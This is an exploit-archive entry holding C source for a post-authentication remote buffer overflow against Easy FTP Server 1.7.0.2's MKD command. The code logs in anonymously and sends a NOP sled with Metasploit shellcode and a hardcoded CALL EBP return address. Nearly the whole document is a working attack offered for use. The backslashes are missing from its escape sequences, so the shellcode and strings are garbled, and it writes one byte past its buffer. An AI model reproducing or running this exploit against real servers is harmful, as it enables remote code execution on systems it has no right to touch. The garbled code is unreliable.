[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Easy Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit
# Published : 2010-04-04
# Author : x90c
# Previous Title : Miniature Java Web Server <= 1.71 Multiple Vulnerabilities
# Next Title : Java Mini Web Server <= 1.0 Path Traversal and Cross Site Scripting
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
//*************************************************************************
// Easy~Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit
// ( 11470_x90c.c )
//
// Date: 24/03/2010
// Author: x90c < x90c.org >
//
// Discovered by: loneferret
//
// Exploits by:
// [1] 11470.py (PoC) - loneferret ( Found: 13/02/2010 )
// - http://www.exploit-db.com/exploits/11470
// [2] 11470_x90c.c ( Exploit )
// ( MAGIC RET, Metasploit shellcode )
//*************************************************************************
// Metasploit shellcode ( calc.exe ) - 228 Bytes
static char shellcode[] =
{
"xd9xccx31xc9xb1x33xd9x74x24xf4x5bxbax99xe4x93"
"x62x31x53x18x03x53x18x83xc3x9dx06x66x9ex75x4f"
"x89x5fx85x30x03xbaxb4x62x77xcexe4xb2xf3x82x04"
"x38x51x37x9fx4cx7ex38x28xfax58x77xa9xcax64xdb"
"x69x4cx19x26xbdxaex20xe9xb0xafx65x14x3axfdx3e"
"x52xe8x12x4ax26x30x12x9cx2cx08x6cx99xf3xfcxc6"
"xa0x23xacx5dxeaxdbxc7x3axcbxdax04x59x37x94x21"
"xaaxc3x27xe3xe2x2cx16xcbxa9x12x96xc6xb0x53x11"
"x38xc7xafx61xc5xd0x6bx1bx11x54x6exbbxd2xcex4a"
"x3dx37x88x19x31xfcxdex46x56x03x32xfdx62x88xb5"
"xd2xe2xcax91xf6xafx89xb8xafx15x7cxc4xb0xf2x21"
"x60xbax11x36x12xe1x7fxc9x96x9fx39xc9xa8x9fx69"
"xa1x99x14xe6xb6x25xffx42x48x6cxa2xe3xc0x29x36"
"xb6x8dxc9xecxf5xabx49x05x86x48x51x6cx83x15xd5"
"x9cxf9x06xb0xa2xaex27x91xc0x31xbbx79x29xd7x3b"
"x1bx35x1d"
};
int main(int argc, char *argv[])
{
int sockfd;
struct sockaddr_in sa;
char rbuf[128];
char x0x[278];
int i = 0, j = 0;
int port = 0;
int err = 0;
printf("nn***********************************************n");
printf("* Easy FTP Server 1.7.0.2 MKD Remote BoF *n");
printf("* Found by: loneferret *n");
printf("* - http://www.exploit-db.com/exploits/11470 *n");
printf("* - 11470_x90c.c - x90c *n");
printf("***************************************************nn");
if( argc < 3 )
{
printf("Usage: %s <Target IP> <Port>nn", argv[0]);
exit(1);
}
port = atoi(argv[2]);
if(port <= 0 || port > 65535)
{
port = 21;
}
printf("[PORT] %d/tcpn", port);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr(argv[1]);
sa.sin_port = htons(port);
if((sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
err = -1;
fprintf(stderr, "[!] Socket failedn");
goto out;
}
// Socket Connect
if(connect(sockfd, (struct sockaddr *)&sa, sizeof(struct sockaddr)) == -1)
{
err = -2;
fprintf(stderr, "[!] Connection failed!n");
goto out;
}
printf("[+] Connected!n");
// Auth
recv(sockfd, rbuf, sizeof(rbuf), 0);
send(sockfd, "USER anonymousrn", 16, 0);
recv(sockfd, rbuf, sizeof(rbuf), 0);
if(strstr(rbuf, "okay") != NULL)
printf("[USER] anonymousn");
send(sockfd, "PASS anonymousrn", 16, 0);
recv(sockfd, rbuf, sizeof(rbuf), 0);
if(strstr(rbuf, "logged in.") != NULL)
printf("[PASS] anonymousn");
// Fill Payload
memset(&x0x, 0x90, sizeof(x0x));
for(i = 20, j = 0; j < strlen(shellcode); j++)
x0x[i++] = shellcode[j];
x0x[0] = 'M';
x0x[1] = 'K';
x0x[2] = 'D';
x0x[3] = ' ';
// MAGIC RET:
// # CALL EBP ( EBP Register points to nopsled of this payload when overflowed )
// # 004041EC FFD5 |CALL EBP
// #
//
x0x[272] = 'xEC';
x0x[273] = 'x41';
x0x[274] = 'x40';
x0x[275] = 'x00';
x0x[276] = 'r';
x0x[277] = 'n';
x0x[278] = 'x00';
printf("[+] Sending payload...n");
// Send payload
send(sockfd, x0x, 278, 0);
recv(sockfd, rbuf, sizeof(rbuf), 0);
if((strstr(rbuf, "denied.") != NULL) || (strstr(rbuf, "too long") != NULL))
{
printf("[!] anonymous account doesn't have permission to MKD command...n");
printf("[!] Exploit Failed. ;-xn");
goto out;
}
printf("[+] Exploited :-)n");
out:
close(sockfd);
return err;
}